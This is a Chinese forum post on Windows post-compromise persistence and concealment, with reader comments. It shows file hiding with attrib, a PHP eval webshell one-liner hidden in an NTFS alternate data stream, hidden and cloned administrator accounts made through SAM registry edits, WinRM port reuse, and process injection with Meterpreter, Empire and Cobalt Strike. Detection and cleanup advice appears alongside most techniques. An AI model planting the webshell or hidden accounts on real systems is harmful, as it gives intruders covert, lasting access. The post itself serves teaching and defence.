【大白分享】渗透安全之Windows权限维持后门隐藏篇
  

山东_朱文鑫 140494人觉得有帮助

{{ttag.title}}
本帖最后由 山东_朱文鑫 于 2023-6-20 15:26 编辑

大家好,我是大白,日、时、分、秒,这是计时的单位,惜时就应该惜日、惜时、惜分、惜秒。依旧感谢各位小伙伴的一路支持与陪伴。



*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!

今天分享大白的渗透安全之Windows权限维持后门隐藏篇,主要是通过我一个很老的虚拟机进行的后门隐藏总结分享,同样还是对于好多小伙伴来说,这个更加偏向于安服,总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要,我们可以一同研习一下渗透攻防的“魅力”。




攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。

隐藏文件

1、利用文件属性

最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。



如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。



如何真正隐藏文件?

使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

  1. attrib +s +a +h +r D:\test\project\test.txt
复制代码

这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见。

破解隐藏文件:

打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件、文件夹和驱动器”。



利用ADS隐藏文件内容

​ 在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:

  1. echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
复制代码

这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。

  1. 问题1:如何查看index.php:hidden.jpg内容呢?

  2. 进入文件所在目录,notepad index.php:hidden.jpg    或者 dir /r
  3.      
  4. 问题2:如何删除index.php:hidden.jpg?

  5.      直接删除index.php即可
复制代码

驱动级文件隐藏

驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker

如果你在网站目录未查找到相关文件,且系统目录存在存在以下文件:

  1. c:\WINDOWS\xlkfs.dat
  2. c:\WINDOWS\xlkfs.dll
  3. c:\WINDOWS\xlkfs.ini
  4. c:\WINDOWS\system32\drivers\xlkfs.sys
复制代码

那么你,应该是遭遇了驱动级文件隐藏。

如何清除?

  1. 1、查询服务状态: sc qc xlkfs
  2. 2、停止服务: net stop xlkfs 服务停止以后,经驱动级隐藏的文件即可显现
  3. 3、删除服务: sc delete xlkfs
  4. 4、删除系统目录下面的文件,重启系统,确认服务已经被清理了。
复制代码

隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系统文件很像的文件名并放在正常目录里面,很难辨别出来。

这些隐藏文件的方式早已不再是秘密,而更多的恶意程序开始实现“无文件”攻击,这种方式极难被发现。

隐藏账号

Window 隐藏系统用户操作,CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。



PS:CMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。

克隆账号制作过程:

1、“开始”→“运行”,输入“regedt32.exe”后回车,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,单机右建权限,把名叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。



2、来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,点击test$用户,得到在右边显示的键值中的“类型”一项显示为0x3ec,找到箭头所指目录。




3、找到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EC”的F值中,保存。



4、分别test$和“000003EC导出到桌面,删除test$用户 net user test$ /del




5、将刚才导出的两个后缀为.reg的注册表项导入注册表中。这样所谓的隐藏账户就创建好了。PS:不管你是在命令提示符下输入net user 或者在系统用户管理界面都是看不到test$这个账户的,只有在注册表中才能看得到。

检测和清理方法:

使用D盾_web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号。



端口复用

通过端口复用来达到隐藏端口的目的,在Window下,如何实现端口复用呢?

很早之前公布了一种基于内置系统服务的端口复用后门方法,利用WinRM服务,一条命令实现端口复用后门:

  1. winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
复制代码

一般开启WinRM服务作为远程管理,但还是第一次听到可以作为端口复用,一种简单容易实现的端口复用方式。假设,攻击者已获取到administrator账号密码,连接远程WinRM服务执行命令:



当执行这条命令的同时,将在安全日志中留下痕迹




另外,可以通过代码实现端口复用重定向


进程注入

进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。在常见的渗透测试框架中,进程注入是怎么做的以及我们如何通过工具排查出来?

1、meterpreter会话注入

当前权限无法获取hash值,查看目前系统进程




通过migrate将进程注入到system进程后,成功获得hash值。




Window后门排查:

通过TCPview显示已建立的TCP连接,我们可以看到异常的连接,同时,恶意软件将以绿色显示不到一秒钟,然后变成红色消失,如此循环。



2、Empire会话进程注入

通过psinject模块进行会话注入,直接输入ps选择一个SYSTEM权限的进程PID,使用进程注入模块,来获取权限。如下图:



Window后门排查:利用process monitor或者火绒剑监控进程都可以定位到注入进程。




3、Cobalt Strike进程注入

选择进程,点击inject,随后选择监听器,点击choose,即可发现Cobaltstrike弹回了目标机的一个新会话,这个会话就是成功注入到某进程的beacon。





Window后门排查:利用process monitor捕捉通信过程,有规律的请求取决于sleep设置的间隔。




除了权限维持还有dll劫持、一些软件的插件后门、office后门等。


*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!


以上就是本次的渗透安全之Windows权限维持后门隐藏篇,一句忠告:业务备份一时不做一时爽,问题出现两行泪,感谢大佬们的参阅,此贴先到这里后续会带上更加实用的帖子,感谢大家!

励志分享超清壁纸语句~~:



时间是个常数,但对勤奋者来说,是个变数。雷巴柯


好的今天就到这里,老样子,感谢各位大神的参阅,孩子为了挣豆子不容易,孩子家里穷没豆子吃饭了!!!

打赏鼓励作者,期待更多好文!

打赏
17人已打赏

新手716814 发表于 2023-11-26 19:27
  
感谢楼主分享,努力学习中!!!
新手716814 发表于 2023-11-26 19:26
  
感谢楼主分享,努力学习中!!!
新手626351 发表于 2023-11-25 11:03
  
感谢楼主分享,努力学习中!!!
婳影 发表于 2023-11-11 09:41
  
楼主分享的案例很实用,具有典型性,希望有更多这样的干货供我们学习参考,非常感谢!
新手716814 发表于 2023-11-7 09:17
  
感谢楼主分享,学习一下
新手716814 发表于 2023-11-3 14:52
  
感谢楼主分享,努力学习中!!!!
新手626351 发表于 2023-10-20 09:14
  
感谢分享有助于工资和学习
新手378833 发表于 2023-10-16 09:28
  
学习到了,有助于工作!
新手626351 发表于 2023-9-28 08:53
  
非常有帮助,很有参考价值
发表新帖
热门标签
全部标签>
技术盲盒
西北区每日一问
安全效果
每日一问
干货满满
【 社区to talk】
新版本体验
技术笔记
功能体验
产品连连看
技术咨询
GIF动图学习
标准化排查
2023技术争霸赛专题
每周精选
通用技术
信服课堂视频
秒懂零信任
技术晨报
安装部署配置
排障笔记本
自助服务平台操作指引
答题自测
原创分享
升级&主动服务
社区新周刊
POC测试案例
畅聊IT
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
玩转零信任
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
深信服技术支持平台
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
排障那些事
高手请过招
高频问题集锦
全能先锋系列
云化安全能力

本版版主

7
20
6

发帖

粉丝

关注

本版达人

ggbang

本周建议达人

adds

本周提问达人